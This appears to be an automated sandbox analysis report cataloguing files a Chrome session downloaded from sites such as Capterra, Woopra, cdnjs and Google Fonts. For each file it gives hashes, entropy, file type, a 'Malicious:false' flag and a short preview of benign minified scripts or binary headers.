                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3445,8218],{67389:function(e,r,t){"use strict";t.d(r,{Z:function(){return x}});var n=t(2784),l=t(2550),a=t(16734),s=t(94673);function o(e){return(o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var i=["className","color","isInteractive","padding","children","colorMode"];function c(){return(c=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e}).apply(this,arguments)}var d=n.forwardRef(function(e,r){var t,d,x,u=e.className,f=e.color,m=e.isInteractive,h=e.padding,g=e.children,p=e.colorMode,b=function(e,r){if(null==e)return{};var t,n,l=function(e,r){if(null==e)return{};var t,n,l={},a=Object.keys(e);for(n=0;n<a.length;n++)t=a[n],r.indexOf(t)>=0||(l[t
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):172832
                                                                                                                                                                                                        Entropy (8bit):5.252399501785341
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:yVjExazug79h2U4kcNxakmBjt4oGZlibTR5ikxYhlUuRNka2wblHiN+wL8z9Gguk:Azug758kkEiXjOAprX2wd5WjguGOo
                                                                                                                                                                                                        MD5:9CBA688DE3179802DC353A91FA774AB9
                                                                                                                                                                                                        SHA1:2DEABD9F4967BF80DE121DF54E34E55B3CB89529
                                                                                                                                                                                                        SHA-256:928AD76603D098AA510D4F476704A3B9E16723E1C64F6B88E4B2295AC1C7FB72
                                                                                                                                                                                                        SHA-512:0077692BC75A9E706A9427C908EBDB6B48A05EFC9A4A7B65C898832142064563A40886B4790F8CBB6CB466031B26432E05DD3F8ABD8BB51EC76858D44AC9E2CC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/1dd3208c-eeb5140fad0be566.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1293],{510:function(e,t,n){var r,l=n(7653),a=n(40158),o={usingClientEntryPoint:!1,Events:null,Dispatcher:{current:null}};function i(e){var t="https://react.dev/errors/"+e;if(1<arguments.length){t+="?args[]="+encodeURIComponent(arguments[1]);for(var n=2;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n])}return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=Object.assign,s=l.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,c=s.ReactCurrentDispatcher,f={pending:!1,data:null,method:null,action:null},d=[],p=-1;function m(e){return{current:e}}function h(e){0>p||(e.current=d[p],d[p]=null,p--)}function g(e,t){d[++p]=e.current,e.current=t}var y=Symbol.for("react.element"),v=Symbol.for("react.portal"),b=Symbol.for("react.fragment"),k=Symbol.for("react.strict_mode"),w=Symbol.for("react.profiler"),S
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):95245
                                                                                                                                                                                                        Entropy (8bit):5.313505721268758
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:wpHUAAOZ01eI11yGbqtOZ8uH/CUU6Y6/ATdT2BN9O1BWtyuutiVXLMGHh6A+ZjqS:wMOpV2ft2iVo+IKDAwQPOeH5cB/1n2X
                                                                                                                                                                                                        MD5:97048519F4A5052076780A0FF665D6A4
                                                                                                                                                                                                        SHA1:94C4D0099D23A1937521B74E2904D876A7CE7C2A
                                                                                                                                                                                                        SHA-256:63754850F22F6479EA5397C1975404E85D3239D4F9D8C7CCFDE20F554CFED73A
                                                                                                                                                                                                        SHA-512:968A72A8ABB9893548790EAB2FC3C07EED38E0D3132A8055D7766C2918E9C8293D6AB7E330EA1E6DADA65575E8DBF0F4DCD78078E9F31D4B4AA9C2C4DEFAD382
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[16],{"+Ry9":function(e,t,n){"use strict";var a=n("mj2O"),r=n.n(a),c=n("7SM1"),i=n("nfbA"),o=n("QtlZ"),u=n("SsZN"),s=n("B8JY"),d=n("Hvhg"),l=n("SFoa"),b=n("TDUE"),f=n("da4L"),v=n("hm8b"),p=n("LVcX"),O=n("pqMu"),g=n("PjZB"),m=n("gG69"),E=n("0lfv"),j=n("3DW5"),I=n("uIJS"),C=n("LvsC"),h=n("qytN"),_=n("7jL2"),A=n("K7i0"),y=n("xwTo"),S=n("g6eD"),T=n("7BJg");function _createSuper2(e){return function(){var t,n=Object(_.a)(e);if(function isNativeReflectConstruct(){if("undefined"===typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"===typeof Proxy)return!0;try{return Date.prototype.toString.call(Reflect.construct(Date,[],function(){})),!0}catch(e){return!1}}()){var a=Object(_.a)(this).constructor;t=Reflect.construct(n,arguments,a)}else t=n.apply(this,arguments);return Object(h.a)(this,t)}}var x=100,k=new(function(e){Object(C.a)(AgentMessageEventBuffer,e);var t=_createSuper2(AgentMessageEventBuffer);func
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-JL3QGDSQZ4&gacid=1381680606.1725034579&gtm=45je48s0v874630860z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=417783928
                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (38072)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):38234
                                                                                                                                                                                                        Entropy (8bit):5.245368391922378
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Ro+E4C3sY5OBUsmadBpBHJm45J4ACZ8CeCJoCkORCDfC6tccQaY7GAjLyLf/jns0:Ro+E75tk7m45J4ACZ8CeCJoCkORCDfC6
                                                                                                                                                                                                        MD5:1D414B3F4FC7F5FEC797CEAB17D2E133
                                                                                                                                                                                                        SHA1:4D9322AD2E0B06FB7F573813C089E5BC26F6FB16
                                                                                                                                                                                                        SHA-256:ABA571489B8EFBC77416A22ABF97A069328AF7352B3319E39CF504AE67406798
                                                                                                                                                                                                        SHA-512:17A4581DD59DA36B022CB4FB4CD3C689D11B14EC2FB4E250A7F02F5024B935EE88CB20EF295EC2278613F81D4CF4D5D58E03E8A20AD23BDB604F906E644F3C32
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://static.woopra.com/js/w.js
                                                                                                                                                                                                        Preview:/*!. * Copyright (c) 2024 Woopra, Inc.. *. * For license information please see https://static.woopra.com/js/w.js.LICENSE.txt. */..!function(){"use strict";function t(t){return void 0===t}var e="object"==typeof global&&global&&global.Object===Object&&global,n="object"==typeof self&&self&&self.Object===Object&&self,i=e||n||Function("return this")(),o=i.Symbol,a=Object.prototype,r=a.hasOwnProperty,s=a.toString,c=o?o.toStringTag:void 0;var u=Object.prototype.toString;var l=o?o.toStringTag:void 0;function h(t){return null==t?void 0===t?"[object Undefined]":"[object Null]":l&&l in Object(t)?function(t){var e=r.call(t,c),n=t[c];try{t[c]=void 0;var i=!0}catch(t){}var o=s.call(t);return i&&(e?t[c]=n:delete t[c]),o}(t):function(t){return u.call(t)}(t)}function d(t){var e=typeof t;return null!=t&&("object"==e||"function"==e)}function f(t){if(!d(t))return!1;var e=h(t);return"[object Function]"==e||"[object GeneratorFunction]"==e||"[object AsyncFunction]"==e||"[object Proxy]"==e}var p=function(){r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 33092, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):33092
                                                                                                                                                                                                        Entropy (8bit):7.993894754675653
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:c+2lFKscxQAuDJ5m/xiYEQNMJjFaf0TteqKt:cZlhcxJuDa/xiMMJhaItzKt
                                                                                                                                                                                                        MD5:057478083C1D55EA0C2182B24F6DD72F
                                                                                                                                                                                                        SHA1:CAF557CD276A76992084EFC4C8857B66791A6B7F
                                                                                                                                                                                                        SHA-256:BB2F90081933C0F2475883CA2C5CFEE94E96D7314A09433FFFC42E37F4CFFD3B
                                                                                                                                                                                                        SHA-512:98FF4416DB333E5A5A8F8F299C393DD1A50F574A2C1C601A0724A8EA7FB652F6EC0BA2267390327185EBEA55F5C5049AB486D88B4C5FC1585A6A975238507A15
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                                                                                                                                                                                        Preview:wOF2.......D......6...............................a......Z?HVAR...`?STAT.8'2..F/~.....|.M....0....6.$.... ..x..<..[.%Q.i.<.N..t.Yx..5.A...|..g#l....5.....D.Bt.......l.Y].)..(..H.s..V..r*uM....[.**....I.0h.v.Hc.R..]....`$.I)G.+.}....E%.H..|..%nEE.....+.x..7|........[..V....[.......0...CA.._....)2.$.....s_fw....+.V.H.B.<?.?..mloc..1.Q....a.r#...)......|.F>..../6-.......t......>......tO.:f@b....u.I(.Bc..b....7.?A.....vE.}...kb]W7.h..$@......T1t.8.._?...~..,..I..."Y...1..s.V........R.Bf2..I....s.........u.P.&..D./"2qf....p.sv..)b5.yR.$MR3.@.E../>{w.....f...cN...2.v.....]>..Ow...9/!v...r..1.4.n.w...T......=...hRH!.....2`...u..82L...S.v.ik^.V.....@..N....d{..{...NN"'.H...H$..H.<..{?..x.....zv.}.~.N)4.g...X.....8|}...e,%.:..;.Q..88...@..=UVHe....g..zD?..U...~.J...oMoP..6B"Y.{BN...vY<.o..r.7.7j%.Z%.'...]...........YK...,.a-;.M....>\.......%'+8Z.1K.y...9.(;.5 ..M..L.(..9...T)........hx..i2Y...m*..{ulY...d......")^.,.n.~..r..S.o.$.....6=.i...N.....q0 ....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4699
                                                                                                                                                                                                        Entropy (8bit):7.269250899428827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jwc5N26MT0D5MdtbZPAVwzVHl2qvzBgT+LbX:+00coYNMtKw/2JK/X
                                                                                                                                                                                                        MD5:F784FEA8886ABDF52885443BF903C339
                                                                                                                                                                                                        SHA1:0D1E8A495AC44AC9FE9F749F09BF6F3EEFABFAE1
                                                                                                                                                                                                        SHA-256:CAE50F35BD99D0915943861C9B9E6D890A6381382814E8D79286B49198CFFB7C
                                                                                                                                                                                                        SHA-512:98B4DEEF7D41779FB12A67E6C6E38A6C859DD728D6E03A3E7F7312064D000C991E0F6A1EADEC0A2C08FAFF3E7A6EB1C914CCFDA97972EAF0644CD5BD86B0E2D3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/db285424-c32d-461f-9382-c24a52b4c2ef.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7024), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7024
                                                                                                                                                                                                        Entropy (8bit):5.243866195527281
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:PQkUObJXxg1A1ZfGtv7nX39ySwBg9yMIDrcj7roqLUZbcrUmj:oO+EBGtb30IKD4nFt
                                                                                                                                                                                                        MD5:612FFE647B0768F5F33C252707F9C7BC
                                                                                                                                                                                                        SHA1:E556BF22A0337FD5EC8A3F909F18EF9193B36B23
                                                                                                                                                                                                        SHA-256:618F630F6E90C43291762500890AB597B5A4B2426EE3B4B633DDB694CA2CA50D
                                                                                                                                                                                                        SHA-512:BF01FB7A85B611227C6AC8334C01B978D7C6F3C75A27A456B28E2B37089CAFBAFAEB1F8BB1DC889258A95D23A4FE972029C08D396E9FD9445920A8F736E4FE4F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5327],{24260:function(e,t){let n;Object.defineProperty(t,"__esModule",{value:!0}),function(e,t){for(var n in t)Object.defineProperty(e,n,{enumerable:!0,get:t[n]})}(t,{DOMAttributeNames:function(){return r},default:function(){return o},isEqualNode:function(){return a}});let r={acceptCharset:"accept-charset",className:"class",htmlFor:"for",httpEquiv:"http-equiv",noModule:"noModule"};function l(e){let{type:t,props:n}=e,l=document.createElement(t);for(let e in n){if(!n.hasOwnProperty(e)||"children"===e||"dangerouslySetInnerHTML"===e||void 0===n[e])continue;let a=r[e]||e.toLowerCase();"script"===t&&("async"===a||"defer"===a||"noModule"===a)?l[a]=!!n[e]:l.setAttribute(a,n[e])}let{children:a,dangerouslySetInnerHTML:o}=n;return o?l.innerHTML=o.__html||"":a&&(l.textContent="string"==typeof a?a:Array.isArray(a)?a.join(""):""),l}function a(e,t){if(e instanceof HTMLElement&&t instanceof HTMLElement){let n=t.getAttribute("nonce")
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7892
                                                                                                                                                                                                        Entropy (8bit):7.956995992455801
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:oeuGje8LT23s1TRwjo+t8Jc1nMT8PTy5jtyhPp6MDHo1XOU/:oIyXMRsoEUc1n14py7XDHoNL/
                                                                                                                                                                                                        MD5:280E66BA46DA3CB9F51AEDA55DA4DC32
                                                                                                                                                                                                        SHA1:2460D18DE4227D22A9F534086ACE1C7CC40F0F1B
                                                                                                                                                                                                        SHA-256:E368CA19E65C8B1F2234DAE386F0C59B23AADD27FFA63CD7CD9ACB54BA897E4F
                                                                                                                                                                                                        SHA-512:BCFCB30D92FAD3CDFD25D4622BC6046C3AE0BEC9DA714B7B0E394E4EFEE381178B70B236CEEB89CE9B0FEE0F1FA68A02D93EF301F51535D3C6708D16CCEC2825
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.}i.\.u.9...^......@........E...JJ.c&.J..~P.(.Rv.Y.c.I....S.Y..8r.;......iY$..A.\@..I..B`..>...{...9....E.3....]=3._...s...........u@[.G.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H.@.H..@#.....4.....{.hR`..2..`..........jlUB..+@...4....rPk..44j.....+(.f.8.q.L..A...,.. ...Pz.2......P........1:]......t..B...5 .!...ny.a.F....C.Nc.mM_Wa|b....&...4:@".Q...FH...2p.Qb.......5?..9..u.q...<...)..ZQ@d......X....."..c>..=po..;..Jv.@....=zn.65O..."..%T......Q...(.z.'n7...nL..r.;07.......]c...B.........].4iP1X.&...s...A1....}...P<W...#..yy fAR..L........w...1.Z.& E..{n.cop...'...,`....K.&&H.........E...".....P.amq.....U'..U."..!...f.bc..b........h.R.4hT.T..B......7.4..@..D...k....-6..........@Z9...Ft...*...{...{6..Q9=V......Q.h5M...b....~..K......6...C.....ie...P..SW........t..C..........?........iH...[.4.'..R....._5.H.).i.?..w.r....!!.4[31LHJ......i$.........?..kw.[X..5.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 622130
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):196789
                                                                                                                                                                                                        Entropy (8bit):7.998419366214683
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:6144:QvhTrDYp/smsj8qSUZOiQKVQKkZ7DbOWW:QdrS03j8RWdlj
                                                                                                                                                                                                        MD5:F353205285D0BEF92A483210D7132936
                                                                                                                                                                                                        SHA1:714A1C55A86637FBAD85D5FB2A61C291353BBD40
                                                                                                                                                                                                        SHA-256:ED67A6A7832056BD9CE9F31A4A7A3FF816B65003B84329F0A7DF4E5749CFF086
                                                                                                                                                                                                        SHA-512:1C75D80B97A3ED1183E2E3A011311A5A17C6A4A05B25F4C2B9BA0335364AA4B484FCFB8F815C52F7ADD3B19E5C12758F2FE6F792CE5A96B34E01D80B16F5CE8D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:...........{..8.0...).m'#.c;q.rU..M.=..i......mk"K.Iv...|...I..8Mg..{.m,Q.. .. ..?.i...F.,LX..'Q<wR?....9..0.X....;:..v..[.$.wo_...8o..i.....',..n.x../g....S......~..z=....2....a.......I.gM......L....N..n.......Y...Y....|.1.+'n.v....O:....a..m.><vN..z...c..wph..<..'......6<..x|p.92.......y3m...m.~.....f.ypb.v..........pd.4;..bf..7..](..=...7....S...B.....^..0..^......'7~......0.]..U.1.]...o..t......1s..TE.......+W?.Z.D?<.F.{6l6...I.....u.Y.fR.X]+`.4..6..8. ...[o.....f..L..........v.........!.i....w..BA.q.pj.2`...Z......Y.....L...c.C.B..,...23....(X.C.*..XY......[..wl.o..;z......=.C...A..q.H...5.1m.3'~.y.,...z.,.C..p.p...S.....PG.p..:....$....h....3_.@.l......g...6...>..........?..-..e.>....t....oSkhM..l.Ye.<....pZ...k...{ZI."...G...%j.G...l...3&. ~+..D1Ez...%H.i....10.=....x.........H;8<8.O...".aO|.vEZ.w..OG..#.vrx(.;.....{"......k...T<.uE.G....w*....dZ...r".v.....'.v.=U1.#..PV.=<..u......c.`........E^..I.DV.EK..9;.e..6..ma.:'..|..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):47992
                                                                                                                                                                                                        Entropy (8bit):5.605846858683577
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (54425), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):54433
                                                                                                                                                                                                        Entropy (8bit):5.318929406464159
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:JCWZDfAxYrIlPxg4ekv/7nyz+b/Lvbqz3pO5o9ueEB9vn:JMx7lPxIk37mobwueEB9vn
                                                                                                                                                                                                        MD5:0DC929FAECE298720A3C1D91FBA63D9E
                                                                                                                                                                                                        SHA1:296D51CB146A8A48F15AD4F77657E1750220B191
                                                                                                                                                                                                        SHA-256:18143B1F4E89703029D8915233C52124D639E229C50BF8E41239BFEF9FF3ECED
                                                                                                                                                                                                        SHA-512:C159BD7201B289BBFC345B1271CD2DDD492E8E114D3D995500319ADE54567B6B7212BEF2339BD37458A9FFE691C6E9D37509585F71EF02988F11963215F349F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3185],{1795:function(e,t,a){Promise.resolve().then(a.bind(a,51246)),Promise.resolve().then(a.bind(a,44498)),Promise.resolve().then(a.bind(a,87520)),Promise.resolve().then(a.bind(a,44314)),Promise.resolve().then(a.bind(a,24491)),Promise.resolve().then(a.bind(a,42424)),Promise.resolve().then(a.t.bind(a,3275,23)),Promise.resolve().then(a.t.bind(a,11311,23)),Promise.resolve().then(a.bind(a,7614)),Promise.resolve().then(a.t.bind(a,25327,23)),Promise.resolve().then(a.t.bind(a,71130,23)),Promise.resolve().then(a.bind(a,34617))},87520:function(e,t,a){"use strict";a.d(t,{default:function(){return s}});var n=a(7653);function r(e,t,a,n){let r=arguments.length>4&&void 0!==arguments[4]&&arguments[4],s=function(e){e.target&&e.target.matches("".concat(a,", ").concat(a," *"))&&n.apply(e.target.closest(a),arguments)};return e.addEventListener(t,s,r),()=>e.removeEventListener(t,s,r)}var s=function(){return(0,n.useEffect)(()=>{let e=function(){let
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x630, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):41524
                                                                                                                                                                                                        Entropy (8bit):7.815950283471118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:4P8z1kqCrfzYT2Q52cVE82RiIh1tlAZ2J4X2h2/kE2IRM3WMNBxg83OiBBBBzOrA:PyrYaQ0cVEVv1tlAUJ4Xf/kdIRM3W6j/
                                                                                                                                                                                                        MD5:213DB640AEB446E202E39C342FD4D357
                                                                                                                                                                                                        SHA1:B6A3E60804F944758364323FB78758F2CBDFB30A
                                                                                                                                                                                                        SHA-256:8A9936FAAA2D12FA4976D7342B9B8A4DF0DF5F78BD263641C36DC1D286BCC11E
                                                                                                                                                                                                        SHA-512:B4CA3599E2FB76EDF7858E746CEA28BD0CB117BE4DE78CE306385F2270B64EF9DA672443B0A57F02B45F4BA6372A7CB04F85D50C884FB71181E52B26D6318BE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://img.pblc.it/i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg"
                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*................/http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:AEE2157787CB11E9BB4D827CB3ECCADD" xmpMM:DocumentID="xmp.did:AEE2157887CB11E9BB4D827CB3ECCADD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AEE2157587CB11E9BB4D827CB3ECCADD" stRef:documentID="xmp.did:AEE2157687CB11E9BB4D827CB3ECCADD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".......C................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                        Entropy (8bit):5.096198382527638
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:7+bJMkZQgiLr+pgiLY4oFgiLIWgiLIfoAo1:2rQ7+po4oFJcoAo1
                                                                                                                                                                                                        MD5:F6353A640DE0A48A58D8FAC61E4B0CA0
                                                                                                                                                                                                        SHA1:3600008EA1E68D5FE59D9892D8F82F3D0416D86B
                                                                                                                                                                                                        SHA-256:7B6CB7D92722E209ED758A8600D26FBF98B0451A77D686D992EE58700AB20E45
                                                                                                                                                                                                        SHA-512:88DA3C02349F3030C1E4519716620AA4BEA0996C0049151DC9947806B97AE5C1F4E33ED8A4095028EED4D34436A48A5E63227A72F046045A9918CBC36E0524D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/content/2/30080812-36e9-4257-a76c-64b9db55c4c1/1725012499262/package/1/publication-web-resources/css/idGeneratedStyles.css
